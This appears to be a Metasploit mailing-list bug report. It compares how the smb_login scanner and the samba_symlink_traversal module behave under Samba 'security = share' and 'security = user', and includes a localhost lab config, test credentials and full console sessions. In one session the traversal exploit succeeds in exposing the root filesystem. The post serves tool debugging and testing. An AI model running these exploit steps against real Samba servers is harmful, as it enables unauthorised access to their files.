smb_login and "security = share"

[Nicob <nicob () nicob net>]

Hello,

it seems that Metasploit (svn r8458) can't fully login to a Samba share
(and exploit the symlink vulnerability) when the Samba "security" option
is set to "share" (instead of "user"). However, the exploit based on
kingcope's modified smbclient is working fine in both situations.

[-=-] Config :

nicob is a valid user, his password is tototo
user ffffff doesn't exist

[global]
        lanman auth = yes
        workgroup = HOME
        netbios name = HOME
        security = [security or user]
        encrypt passwords = yes
        passdb backend = smbpasswd
        smb passwd file = /etc/samba/msf_passwd
        browseable = yes
[NAS]
        path=/tmp/
        comment = NAS Share
        browseable = yes
        read only = no

[-=-] if security = share :

msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(smb_login) > set SMBPass tototo
SMBPass => tototo
msf auxiliary(smb_login) > set SMBUser nicob
SMBUser => nicob
msf auxiliary(smb_login) > run

[*] Starting host 127.0.0.1
[*] 127.0.0.1 - GUEST LOGIN (Unix) nicob : tototo
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(smb_login) > set SMBUser fffffff
SMBUser => fffffff
msf auxiliary(smb_login) > set SMBPass foo
SMBPass => foo
msf auxiliary(smb_login) > rerun

[*] Starting host 127.0.0.1
[*] 127.0.0.1 - GUEST LOGIN (Unix) ffffff : foo
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

=> only "GUEST" access is detected
=> username and password are irrelevant

msf auxiliary(samba_symlink_traversal) > rerun

[*] Connecting to the server...
[*] Trying to mount writeable share 'NAS'...
[-] Auxiliary failed: Rex::Proto::SMB::Exceptions::ErrorCode The server
responded with error: STATUS_WRONG_PASSWORD (Command=117 WordCount=0)
[-] Call stack:
[-]   xxx/trunk/lib/rex/proto/smb/client.rb:176:in `smb_recv_parse'
[-]   xxx/trunk/lib/rex/proto/smb/client.rb:951:in `tree_connect'
[-]   xxx/trunk/lib/rex/proto/smb/simpleclient.rb:253:in `connect'
[-]   (eval):64:in `run'
[*] Auxiliary module execution completed

=> exploit failed

[-=-] if security = user :

msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(smb_login) > set SMBPass tototo
SMBPass => tototo
msf auxiliary(smb_login) > set SMBUser nicob
SMBUser => nicob
msf auxiliary(smb_login) > run

[*] Starting host 127.0.0.1
[+] 127.0.0.1 - SUCCESSFUL LOGIN (Unix) 'nicob' : 'tototo'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

=> nicob/tototo is detected as a valid login

msf auxiliary(samba_symlink_traversal) > rerun

[*] Connecting to the server...
[*] Trying to mount writeable share 'NAS'...
[*] Trying to link 'escape' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*]     \\127.0.0.1\NAS\escape\
[*] Auxiliary module execution completed

=> exploit is working

Nicob



_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework